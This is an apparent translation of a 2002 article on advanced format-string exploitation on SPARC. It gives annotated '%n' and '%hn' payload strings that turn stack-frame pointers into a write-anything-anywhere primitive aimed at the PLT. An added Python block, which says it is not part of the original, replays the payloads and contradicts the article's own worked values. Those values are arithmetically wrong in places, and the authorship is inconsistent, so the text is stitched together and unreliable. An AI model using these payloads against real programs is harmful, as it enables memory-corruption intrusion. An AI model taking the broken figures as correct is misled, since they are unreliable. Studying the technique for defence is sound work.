Advanced Format String Exploit Technology P59-0X07 (below)
Creation time: 2002-08-23
Article attribute: translation
Article Source:
http://www.whitecell.org
Article submission:
DEBUGER (z_yikai_at_163.net)
|=---------------------=[ riq ]=|
Original: "Advances in Format String Exploiting"
By Gera
Yikaikai
http://www.whitecell.org
--[ Table of Contents
  1 - Introduction
  2 - Stack
  3 - Tricks
    3.1 - Example 1
    3.2 - Example 2
    3.3 - Example 3
    3.4 - Example 4
  4 - 4-byte Write-Anything-Anywhere primitive abuse
    4.1 - Example 5
  5 - Conclusion
    5.1 - Is it dangerous to overwrite a stack frame's local 0?
    5.2 - Is this method reliable?
    5.3 - Does it work on i386?
  6 - Postscript
    6.1 - References
    6.2 - Thanks
--[ 1 - Introduction
Usually the format string is on the stack, but sometimes it is not, and then you cannot see it.
scut discussed this in section 6.4 of his article on format string attacks:
http://www.team-teeso.net/articles/formatstring/
Here I present a general method for handling such a string on SPARC (a big-endian machine).
It is similar on i386.
--[ 2 - Stack
On the stack you can find the stack frames. A frame holds local variables, saved registers, a pointer to the
previous frame, the return address, and so on.
Since you can see all of these with a format string, we have to study them carefully.
A SPARC stack frame is roughly as follows.
Note that SPARC has four sets of general-purpose registers with 8 registers each. One set is the global registers;
the other three sets are OUT, LOCAL and IN.
   Frame 0          Frame 1          Frame 2
   [l0]      ---->  [l0]      ---->  [l0]
   [l1]         |   [l1]         |   [l1]
   ...          |   ...          |   ...
   [l7]         |   [l7]         |   [l7]
   [i0]         |   [i0]         |   [i0]
   [i1]         |   [i1]         |   [i1]
   ...          |   ...          |   ...
   [i5]         |   [i5]         |   [i5]
   [fp]      ---|   [fp]      ---|   [fp]
   [i7]             [i7]             [i7]
   [TEMP 1]         [TEMP 1]
   [TEMP 2]
   etc.
The register fp is a pointer to the calling frame; as you can guess, 'fp' stands for frame pointer.
TEMP_N are local variables stored on the stack. Frame 1 starts right after the local variables of frame 0,
frame 2 starts right after the local variables of frame 1, and so on.
All frames are on the stack, so we can see all of them with our format string.
--[ 3 - Tricks
The trick is to have a pointer that points forward into a stack frame; the more addresses you have pointing into the stack,
the better your chances of success.
Why? If we have a pointer into our own stack, we can overwrite the address it points to with any value.
--[ 3.1 - Example 1
Suppose we want to put 0x1234 into local 0 of frame 1. We have to build a format string that reaches
the position of frame 0's fp with an output length of exactly 0x1234, and at that position we put a '%n'.
Suppose the first parameter is frame 0's local 0; our format string is then as follows (written in Python):
'%8x' * 8        # pops the 8 local registers
'%8x' * 5        # pops the first 5 in registers
'%4640d'         # changes the length of the string (4640 is 0x1220) and...
'%n'             # writes where fp points (which is frame 1's l0)
When the format string is executed, the stack looks like this:
   Frame 0          Frame 1
   [l0]      ---->  [0x00001234]
   [l1]         |   [l1]
   ...          |   ...
   [l7]         |   [l7]
   [i0]         |   [i0]
   [i1]         |   [i1]
   ...          |   ...
   [i5]         |   [i5]
   [fp]      ---|   [fp]
   [i7]             [i7]
   [TEMP 1]         [TEMP 1]
   [TEMP 2]
--[ 3.2 - Example 2
If we want to write a bigger number, like 0x20001234, we have to look for two pointers to the same address
on the stack, as follows:
   Frame 0          Frame 1
   [l0]      ---->  [l0]
   [l1]         |   [l1]
   ...          |   ...
   [l7]         |   [l7]
   [i0]         |   [i0]
   [i1]         |   [i1]
   ...          |   ...
   [i5]         |   [i5]
   [fp]      ---|   [fp]
   [i7]         |   [i7]
   [TEMP 1]  ----   [TEMP 1]
   [TEMP 2]
[Note: two pointers to the same address are not easy to find, although they are not rare.]
So our format string looks as follows:
'%8x' * 8        # pops the 8 local registers
'%8x' * 5        # pops the first 5 in registers
'%4640d'         # changes the length of the string (4640 = 0x1220)
'%n'             # writes where fp points (which is frame 1's l0)
'%3530d'         # changes the length of the string again
'%hn'            # this time we change the high part!
We will get:
   Frame 0          Frame 1
   [l0]      ---->  [0x20001234]
   [l1]         |   [l1]
   ...          |   ...
   [l7]         |   [l7]
   [i0]         |   [i0]
   [i1]         |   [i1]
   ...          |   ...
   [i5]         |   [i5]
   [fp]      ---|   [fp]
   [i7]         |   [i7]
   [TEMP 1]  ----   [TEMP 1]
   [TEMP 2]
--[ 3.3 - Example 3
In this example we have only one pointer. Using direct parameter access in the format string we can get the same
result, with '%arg_number$', where arg_number is in the range 0-30 (on Solaris).
The format string is as follows:
'%4640d'         # changes the length
'%15$n'          # writes to the 15th parameter (the 15th parameter is where fp is!)
'%3530d'         # changes the length again
'%15$hn'         # writes again (the high part)!
Therefore we get the following result:
   Frame 0          Frame 1
   [l0]      ---->  [0x20001234]
   [l1]         |   [l1]
   ...          |   ...
   [l7]         |   [l7]
   [i0]         |   [i0]
   [i1]         |   [i1]
   ...          |   ...
   [i5]         |   [i5]
   [fp]      ---|   [fp]
   [i7]             [i7]
   [TEMP 1]         [TEMP 1]
   [TEMP 2]
--[ 3.4 - Example 4
But what if no two pointers point to the same address on the stack, and the first pointer into the stack
is usually beyond the first 30 parameters? What then?
You should know that with a single '%n' you can write a fairly large number, like 0x0028000 or bigger, and you should know
that the binary's dynamic linking table is usually located at a low address, like 0x0002????. So with only one pointer into the stack
you can get a pointer to the binary's PLT.
I don't think a diagram is necessary here.
--[ 4 - 4-byte Write-Anything-Anywhere primitive abuse
--[ 4.1 - Example 5
To get the 4-byte write-anything-anywhere primitive, we repeat what we did with a stack frame's local 0
on another frame, for example frame 1, so the result looks as follows:
   Frame 0          Frame 1              Frame 2
   [l0]      ---->  [0x00029e8c]  ---->  [0x00029e8e]
   [l1]         |   [l1]             |   [l1]
   ...          |   ...              |   ...
   [l7]         |   [l7]             |   [l7]
   [i0]         |   [i0]             |   [i0]
   [i1]         |   [i1]             |   [i1]
   ...          |   ...              |   ...
   [i5]         |   [i5]             |   [i5]
   [fp]      ---|   [fp]          ---|   [fp]
   [i7]             [i7]             |   [i7]
   [TEMP 1]         [TEMP 1]         |
   [TEMP 2]  -------------------------
   [TEMP 3]
[Note: 0x00029e8c is taken to be the address of the code we want to change.]
Now we have two pointers, one pointing to 0x00029e8c and one pointing to 0x00029e8e, which is exactly what we wanted.
Now we can attack this location just as with any other format string.
The format string looks as follows:
'%4640d'         # changes the length
'%15$n'          # writes the low part of frame 1's local 0 using direct access
'%3530d'         # changes the length again
'%15$hn'         # overwrites the high part
'%9876d'         # changes the length
'%18$hn'         # and writes, just like any format string exploit!
'%8x' * 13       # pops 13 parameters (starting from the 15th)
'%6789d'         # changes the length
'%n'             # writes the low part
'%8x'            # pops one more
'%1122d'         # changes the length
'%hn'            # writes the high part
'%2211d'         # changes the length
'%hn'            # writes again, just like any exploit
As you can see, this is done with just one format string, but it is not always like this.
If we cannot create two pointers, we can still do it by abusing the format string more than once.
First, create a pointer to 0x00029e8c, then overwrite 0x00029e8c with '%hn' to change where
the pointer points.
Then abuse the format string again, just as before, using the pointer to 0x00029e8c.
--[ 5 - Conclusion
--[ 5.1 - Is it dangerous to overwrite a stack frame's local 0?
It is not ideal, but in practice changing the value of local 0 has caused no problems. If you happen to be unlucky,
you would rather change the local 0 belonging to the main() or _start() frame.
--[ 5.2 - Is this method reliable?
If you know the state of the stack, or at least the size of the stack frames, it is reliable; otherwise this technique
will not help you much.
I would keep it as a last choice, for when the value you have to write contains zero bytes, because you cannot put a 0 into the format
string (it would truncate the string).
Similarly, the binary's procedure linkage table (PLT) is located at a low address, and overwriting the binary's PLT is more reliable than overwriting libc's PLT.
Why? I think Solaris libraries change more often than the binary you want to exploit; the binary's code
may never change.
--[ 5.3 - Does it work on i386?
Yes, probably. I think you may run into problems with '%n' and '%hn'
(i386 is little-endian), but I believe everything else works on i386 too.
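To make the arithmetic of Examples 2 and 3 and the little-endian caveat of 5.3 concrete, here is an added Python model that is not part of the original article: it replays a format string against a constructed stack (fp as the 15th argument, TEMP 1 as the 17th, one 32-bit target word) and reports what the '%n' and '%hn' stores leave there. Example 3's widths are constructed so that the writes land on the page's 0x20001234; switching the byte order shows why the same sequence gives a different word on i386.

```python
import re
import struct

# Constructed stack model: each printf conversion consumes one 4-byte argument
# slot; the slots listed in pointer_slots hold the address of the target word
# (the page's fp and TEMP 1 pointers into frame 1's l0). Hypothetical widths,
# not the page's own numbers, are used where noted.
TOKEN = re.compile(r'%(?:(\d+)\$)?(\d*)(hn|n|d|x)')

def replay(fmt, pointer_slots, endian='>'):
    """Replay fmt and return (word left at the target, bytes output).

    endian '>' models big-endian SPARC, '<' models little-endian i386.
    Assumes printed values never exceed their field width, so '%8x' adds
    exactly 8 to the count that '%n' stores.
    """
    cell = bytearray(4)   # the 32-bit word being overwritten
    count = 0             # bytes output so far: the value %n / %hn store
    next_arg = 1          # next slot consumed by a conversion without '$'
    for direct, width, conv in TOKEN.findall(fmt):
        if direct:                       # '%15$n': direct parameter access
            slot = int(direct)
        else:
            slot, next_arg = next_arg, next_arg + 1
        if conv in ('d', 'x'):
            count += int(width) if width else 1
        elif slot not in pointer_slots:
            raise ValueError(f'%{conv} through slot {slot}: not a stack pointer')
        elif conv == 'n':                # 4-byte store of the count
            cell[:] = struct.pack(endian + 'I', count & 0xffffffff)
        else:                            # 'hn': 2-byte store at the same address
            cell[0:2] = struct.pack(endian + 'H', count & 0xffff)
    return struct.unpack(endian + 'I', bytes(cell))[0], count

# Section 3.2 layout: fp is the 15th argument and TEMP 1 the 17th.
EXAMPLE2 = '%8x' * 13 + '%4640d%n%3530d%hn'
# Section 3.3 layout with constructed widths that land on the page's 0x20001234:
# 4660 = 0x1234 for the '%n', then 3532 more bytes so the '%hn' stores 0x2000.
EXAMPLE3 = '%4660d%15$n%3532d%15$hn'

if __name__ == '__main__':
    print(hex(replay(EXAMPLE2, {15, 17})[0]))    # SPARC: 0x20521288
    print(hex(replay(EXAMPLE3, {15})[0]))        # SPARC: 0x20001234
    # On i386 the '%hn' lands on the low half and wipes the 0x1234 written by '%n'.
    print(hex(replay(EXAMPLE3, {15}, '<')[0]))   # i386: 0x2000
```

The same replay is a quick way for an analyst to check what a captured format string would have written before deciding how serious a reported '%n' sink is.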
--[ 6 - Postscript
--[ 6.1 - References
Very complete format strings article by scut:
http://www.team-teeso.net/articles/formatstring/
--[ 6.2 - Thanks
Juliano, for letting me know that I can overwrite an address as many times as I
want using 'direct access', and for other tips about format strings.
Gera, for his ideas, suggestions and fixes.
Javier, for helping me with SPARC.
Bombi, for trying her English.
And Bruce, for correcting my English, too.
riq.
|=[ EOF ]=--------------------------------------------------------------=|
[Thanks to alert7 and eagle for their support, especially alert7, who pointed out many problems in the first draft of my translation
and gave some references, such as <<Solaris for sparc stack overflow program Writing (1)>> by Warning3 (Warning3@hotmail.com)]